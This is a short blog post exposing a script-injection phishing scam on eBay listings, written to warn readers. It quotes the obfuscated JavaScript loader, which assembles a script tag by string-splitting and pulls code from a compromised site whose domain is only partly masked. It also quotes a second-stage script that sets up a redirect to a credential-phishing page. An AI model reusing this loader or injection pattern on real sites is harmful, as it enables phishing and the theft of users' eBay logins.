The Ebay Redirect Scam

I recently found out about yet another issue Ebay has had with security on there site. This time, the issue is script injection. I've attempted to briefly expose the technical innerworkings of this in this post. Here's an example:

When the use clicks on this page, a piece of remote javascript is loaded using this:
<br /> <span class="Apple-tab-span" style="white-space: pre;"> </span><br /> <span class="Apple-tab-span" style="white-space: pre;"> </span><br /> <span class="Apple-tab-span" style="white-space: pre;"> </span><br /> <table align="center" style="border-spacing: 0px; width: 100%;"><tbody> <tr><td><br /> <span class="Apple-tab-span" style="white-space: pre;"> </span><br /> <div id="ds_div"> <br /> <span class="Apple-tab-span" style="white-space: pre;"> </span><script type="text/javascript"><br>var az = "SC";var bz = "RI";var cz = "PT";var dz = "SR";var ez = "C=";var fz = "htt";var gz = "p://";<br>var fz0 = "agwgi.gr/wp-includes/js/tt/js5.js" ;<br>document.write ("<"+az+bz+cz+" type='text/javascript'"+dz+ez+fz+gz+fz0+">");<br>document.write("</"+az+bz+cz+">");<br></script><script src="http://*****.gr/wp-includes/js/tt/js5.js" type="text/javascript"></script></div> <br /> <span class="Apple-tab-span" style="white-space: pre;"> </span></td></tr> </tbody></table>
 Which, in turn loads this script from a Greek site:



<pre style="white-space: pre-wrap; word-wrap: break-word;"><b><code><code>function randomString(length, chars) { var result = ''; for (var i = length; i > 0; --i) result += chars[Math.round(Math.random() * (chars.length - 1))]; return result; } var a = randomString(32, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'); var c = randomString(32, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'); var e = randomString(32, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'); var f = randomString(32, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'); var d = randomString(3, '0123456789'); var b ="http://****.com.tr/wp-includes/js/thickbox/ac/beta.htm"; </code></code></b></pre> <b>
I don't know if any of the site owners are innocent, so I've commented them out just in case.

This JavaScript then sends a redirect to another page, which in turn redirects to a site asking for the users Ebay credentials (note the Norton verification seal in the bottom corner):

The login page is a PHP page and seems to change according to different ads placed on Ebay, but they're all focussed on phising Ebay credentials. 

To resolve this, Ebay should stop users submitting javascript in the description of listed products and, as this has actually been around for a while in the form of a flash app, flash should also be blocked.